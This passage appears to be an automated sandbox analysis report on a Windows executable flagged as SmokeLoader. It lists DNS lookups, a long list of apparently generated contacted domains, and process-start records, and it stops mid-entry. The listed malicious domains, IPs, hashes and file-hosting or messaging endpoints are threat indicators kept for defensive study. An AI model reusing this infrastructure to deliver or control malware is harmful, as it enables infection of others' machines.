Jan 14, 2022 19:09:10.384404898 CET | 8.8.8.8 | 192.168.2.5 | 0xddd3 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:10.825388908 CET | 8.8.8.8 | 192.168.2.5 | 0x8cb0 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:11.314507008 CET | 8.8.8.8 | 192.168.2.5 | 0xb88a | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:11.499597073 CET | 8.8.8.8 | 192.168.2.5 | 0x9f8a | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:11.688426971 CET | 8.8.8.8 | 192.168.2.5 | 0xac73 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:12.127974987 CET | 8.8.8.8 | 192.168.2.5 | 0x8f08 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:13.506998062 CET | 8.8.8.8 | 192.168.2.5 | 0x9857 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:13.966306925 CET | 8.8.8.8 | 192.168.2.5 | 0xc3e6 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:14.136221886 CET | 8.8.8.8 | 192.168.2.5 | 0x5f4f | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:16.192797899 CET | 8.8.8.8 | 192.168.2.5 | 0xb8b3 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:16.360732079 CET | 8.8.8.8 | 192.168.2.5 | 0x82e5 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:16.852404118 CET | 8.8.8.8 | 192.168.2.5 | 0xdc51 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:17.337629080 CET | 8.8.8.8 | 192.168.2.5 | 0x4068 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:17.837946892 CET | 8.8.8.8 | 192.168.2.5 | 0xfeed | No error (0) | privacy-tools-for-you-780.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:21.073492050 CET | 8.8.8.8 | 192.168.2.5 | 0x7a | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:21.244182110 CET | 8.8.8.8 | 192.168.2.5 | 0x6c1c | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:21.517277002 CET | 8.8.8.8 | 192.168.2.5 | 0xa496 | No error (0) | unicupload.top | | 54.38.220.85 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:21.593890905 CET | 8.8.8.8 | 192.168.2.5 | 0xa674 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:21.774349928 CET | 8.8.8.8 | 192.168.2.5 | 0x2ae1 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:21.949736118 CET | 8.8.8.8 | 192.168.2.5 | 0x45ad | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:22.123107910 CET | 8.8.8.8 | 192.168.2.5 | 0x58fe | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:22.587418079 CET | 8.8.8.8 | 192.168.2.5 | 0xc071 | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:24.557038069 CET | 8.8.8.8 | 192.168.2.5 | 0x9c96 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:24.728074074 CET | 8.8.8.8 | 192.168.2.5 | 0x80f1 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:24.903656006 CET | 8.8.8.8 | 192.168.2.5 | 0xa1aa | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:25.076198101 CET | 8.8.8.8 | 192.168.2.5 | 0x44df | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:27.434825897 CET | 8.8.8.8 | 192.168.2.5 | 0x6ce0 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:27.628560066 CET | 8.8.8.8 | 192.168.2.5 | 0xff0f | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:27.801300049 CET | 8.8.8.8 | 192.168.2.5 | 0x85c6 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:27.991117954 CET | 8.8.8.8 | 192.168.2.5 | 0xacf | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:27.991117954 CET | 8.8.8.8 | 192.168.2.5 | 0xacf | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:27.991117954 CET | 8.8.8.8 | 192.168.2.5 | 0xacf | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:27.991117954 CET | 8.8.8.8 | 192.168.2.5 | 0xacf | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:27.991117954 CET | 8.8.8.8 | 192.168.2.5 | 0xacf | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:30.085545063 CET | 8.8.8.8 | 192.168.2.5 | 0xbf32 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:30.256505013 CET | 8.8.8.8 | 192.168.2.5 | 0x6a35 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:30.421962976 CET | 8.8.8.8 | 192.168.2.5 | 0x71eb | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:43.396714926 CET | 8.8.8.8 | 192.168.2.5 | 0xf76c | No error (0) | microsoft-com.mail.protection.outlook.com | | 52.101.24.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:43.396714926 CET | 8.8.8.8 | 192.168.2.5 | 0xf76c | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.207.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:43.396714926 CET | 8.8.8.8 | 192.168.2.5 | 0xf76c | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.212.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:43.396714926 CET | 8.8.8.8 | 192.168.2.5 | 0xf76c | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.207.1 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:43.396714926 CET | 8.8.8.8 | 192.168.2.5 | 0xf76c | No error (0) | microsoft-com.mail.protection.outlook.com | | 104.47.54.36 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:43.396714926 CET | 8.8.8.8 | 192.168.2.5 | 0xf76c | No error (0) | microsoft-com.mail.protection.outlook.com | | 104.47.53.36 | A (IP address) | IN (0x0001)
Jan 14, 2022 19:09:46.160974026 CET | 8.8.8.8 | 192.168.2.5 | 0x7543 | No error (0) | patmushta.info | | 94.142.143.116 | A (IP address) | IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:51.718183994 CET8.8.8.8192.168.2.50xa402No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:51.889224052 CET8.8.8.8192.168.2.50xd245No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:52.358066082 CET8.8.8.8192.168.2.50xff90No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:52.703072071 CET8.8.8.8192.168.2.50x682fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:52.886606932 CET8.8.8.8192.168.2.50x6e11No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.056230068 CET8.8.8.8192.168.2.50xde79No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.222333908 CET8.8.8.8192.168.2.50xf614No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.389302015 CET8.8.8.8192.168.2.50xc24dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.551351070 CET8.8.8.8192.168.2.50xd299No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.725091934 CET8.8.8.8192.168.2.50xcff8No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.922821999 CET8.8.8.8192.168.2.50x48d4No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:54.206341982 CET8.8.8.8192.168.2.50x498fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:54.392158031 CET8.8.8.8192.168.2.50xc996No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:54.660291910 CET8.8.8.8192.168.2.50x8151No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:57.285299063 CET8.8.8.8192.168.2.50x5361No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:57.452198982 CET8.8.8.8192.168.2.50xc314No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:57.630558014 CET8.8.8.8192.168.2.50xf7c5No error (0)goo.su172.67.139.105A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:57.630558014 CET8.8.8.8192.168.2.50xf7c5No error (0)goo.su104.21.38.221A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:58.006366014 CET8.8.8.8192.168.2.50x4d2aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:58.180192947 CET8.8.8.8192.168.2.50xe30aNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:58.365708113 CET8.8.8.8192.168.2.50x8b73No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:58.593264103 CET8.8.8.8192.168.2.50x42a6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:58.764146090 CET8.8.8.8192.168.2.50x5eb0No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:58.960181952 CET8.8.8.8192.168.2.50x32e9No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:59.130079031 CET8.8.8.8192.168.2.50xabaeNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:07.366018057 CET8.8.8.8192.168.2.50x8611No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:07.561201096 CET8.8.8.8192.168.2.50x80e8No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:07.751497030 CET8.8.8.8192.168.2.50xbba2No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:07.938688040 CET8.8.8.8192.168.2.50x53bbNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:08.159094095 CET8.8.8.8192.168.2.50x9f55No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:12.556054115 CET8.8.8.8192.168.2.50xf62cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:12.807543993 CET8.8.8.8192.168.2.50xe3c9No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:12.975985050 CET8.8.8.8192.168.2.50xf6ddNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:15.908402920 CET8.8.8.8192.168.2.50xd2d7No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:16.078675985 CET8.8.8.8192.168.2.50xafa8No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:16.582515955 CET8.8.8.8192.168.2.50xa528No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:17.777923107 CET8.8.8.8192.168.2.50x96feNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:18.231518984 CET8.8.8.8192.168.2.50xe098No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:25.023981094 CET8.8.8.8192.168.2.50x8ab5No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:25.189588070 CET8.8.8.8192.168.2.50x4602No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:25.382838011 CET8.8.8.8192.168.2.50x72b3No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:26.740726948 CET8.8.8.8192.168.2.50x8ec9No error (0)patmushta.info94.142.143.116A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:27.951181889 CET8.8.8.8192.168.2.50x970No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:28.408941984 CET8.8.8.8192.168.2.50xdb9eNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:28.579654932 CET8.8.8.8192.168.2.50x7f32No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:28.743089914 CET8.8.8.8192.168.2.50x198cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:28.921109915 CET8.8.8.8192.168.2.50xa4fcNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:31.481004000 CET8.8.8.8192.168.2.50x387No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:32.155909061 CET8.8.8.8192.168.2.50xf4eeNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:32.403192043 CET8.8.8.8192.168.2.50x3a28No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:33.806910038 CET8.8.8.8192.168.2.50xe497No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:34.033373117 CET8.8.8.8192.168.2.50x6864No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:34.311547041 CET8.8.8.8192.168.2.50x5f07No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:35.688616037 CET8.8.8.8192.168.2.50xbe71No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:35.854535103 CET8.8.8.8192.168.2.50x130eNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:36.034266949 CET8.8.8.8192.168.2.50x7e50No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.106853962 CET8.8.8.8192.168.2.50x490eNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.106853962 CET8.8.8.8192.168.2.50x490eNo error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.106853962 CET8.8.8.8192.168.2.50x490eNo error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.106853962 CET8.8.8.8192.168.2.50x490eNo error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.106853962 CET8.8.8.8192.168.2.50x490eNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.106853962 CET8.8.8.8192.168.2.50x490eNo error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.987297058 CET8.8.8.8192.168.2.50x6a1eNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.987297058 CET8.8.8.8192.168.2.50x6a1eNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.987297058 CET8.8.8.8192.168.2.50x6a1eNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.987297058 CET8.8.8.8192.168.2.50x6a1eNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.987297058 CET8.8.8.8192.168.2.50x6a1eNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:44.763099909 CET8.8.8.8192.168.2.50x55ccNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:44.788398981 CET8.8.8.8192.168.2.50x247bNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:44.996448040 CET8.8.8.8192.168.2.50xce19No error (0)ipwhois.app136.243.172.101A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:45.672281027 CET8.8.8.8192.168.2.50xb7cdNo error (0)c9d0e790b353537889bd47a364f5acff43c11f248.xyz185.112.83.97A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:45.861773014 CET8.8.8.8192.168.2.50xbecaNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:45.861773014 CET8.8.8.8192.168.2.50xbecaNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:45.861773014 CET8.8.8.8192.168.2.50xbecaNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:45.861773014 CET8.8.8.8192.168.2.50xbecaNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:45.861773014 CET8.8.8.8192.168.2.50xbecaNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:47.343697071 CET8.8.8.8192.168.2.50x2e44No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:48.189995050 CET8.8.8.8192.168.2.50xa86aNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:57.902101040 CET8.8.8.8192.168.2.50x71c1No error (0)dl.uploadgram.me176.9.247.226A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.223313093 CET8.8.8.8192.168.2.50xc8faNo error (0)yahoo.comMX (Mail exchange)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.223313093 CET8.8.8.8192.168.2.50xc8faNo error (0)yahoo.comMX (Mail exchange)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.223313093 CET8.8.8.8192.168.2.50xc8faNo error (0)yahoo.comMX (Mail exchange)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.242662907 CET8.8.8.8192.168.2.50xd0a2No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.242662907 CET8.8.8.8192.168.2.50xd0a2No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.242662907 CET8.8.8.8192.168.2.50xd0a2No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.242662907 CET8.8.8.8192.168.2.50xd0a2No error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.242662907 CET8.8.8.8192.168.2.50xd0a2No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.242662907 CET8.8.8.8192.168.2.50xd0a2No error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.242662907 CET8.8.8.8192.168.2.50xd0a2No error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.242662907 CET8.8.8.8192.168.2.50xd0a2No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)

HTTP Request Dependency Graph

• sasldotps.net
  • host-data-coin-11.com
• hvxghwlm.org
• gvuhy.com
• xcewx.net
• fuylvs.net
• ejshmyhdg.net
• fxdrjy.net
• pmdsi.net
• data-host-coin-8.com
• jvggxpunvp.net
• utujjcpga.com
• anaxqk.org
• aeoceljuvu.org
• privacy-tools-for-you-780.com
• tavpv.org
• ylklohfb.net
• unicupload.top
• snjxprkrs.net
• ognsyxbqt.net
• mqsidiop.net
• ffjbt.com
• xhmgc.org
• dlrkn.org
• hqphi.org
• hrbkqnyvuq.org
• 185.7.214.171:8080
• oanyhf.net
• ebkix.org
• kglcf.net
• ralhhxo.com
• ucqxo.com
• rvrxkhapq.org
• tmefv.org
• ublgjca.net
• uauswjxvxi.com
• ihlanbec.com
• ocvhk.net
• bunksfs.com
• bhqyvtr.org
• vvcoavsyoi.org
• mgspnorl.com
• jlttjsjsn.net
• lwmkqmxs.net
• wodlytuu.org
• opwshtlv.com
• iofaey.org
• ndvhcbnqxy.net
• slwqa.org
• mudbgksxf.com
• ltpsu.com
• lkdybspw.org
• tumar.com
• dxlbaxnq.com
• 81.163.30.181
• vmrsokyf.net
• kuhyti.org
• jhryuyevsi.com
• tsjnpmoxk.net
• dhgvgbi.net
• sthgmss.net
• lqucepm.org
• drivqge.com
• srpcpdlmu.net
• sbdfkwshp.net
• getygnekfa.net
• svqaek.com
• vcddpnrql.org
• lchxcgbqi.org
• ksxvhtvig.net
                                                                                                                        • nxrloqgt.org
                                                                                                                        • aeymga.org
                                                                                                                        • duekablkqo.com
                                                                                                                        • foilygkb.org
                                                                                                                        • babqykwmy.org
                                                                                                                        • ygspe.com
                                                                                                                        • sytacviqe.org

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 19:08:25
Start date: 14/01/2022
Path: C:\Users\user\Desktop\GNXG5XLBEH.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\GNXG5XLBEH.exe"
Imagebase: 0x400000
File size: 321536 bytes
MD5 hash: 6F48E0E76C5DFB3FC3AA45311FA6D0EF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 19:08:26
Start date: 14/01/2022
Path: C:\Users\user\Desktop\GNXG5XLBEH.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\GNXG5XLBEH.exe"
Imagebase: 0x400000
File size: 321536 bytes
MD5 hash: 6F48E0E76C5DFB3FC3AA45311FA6D0EF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.303363186.0000000000470000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.303673269.0000000002091000.00000004.00020000.sdmp, Author: Joe Security
Reputation: low

General

Start time: 19:08:33
Start date: 14/01/2022
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff693d90000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000000.288599943.00000000030E1000.00000020.00020000.sdmp, Author: Joe Security
Reputation: high

General

Start time: 19:08:35
Start date: 14/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:08:43
Start date: 14/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:08:45
Start date: 14/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:08:46
Start date: 14/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:08:46
Start date: 14/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:08:47
Start date: 14/01/2022
Path: C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\SgrmBroker.exe
Imagebase: 0x7ff64ff60000
File size: 163336 bytes
MD5 hash: D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:08:47
Start date: 14/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
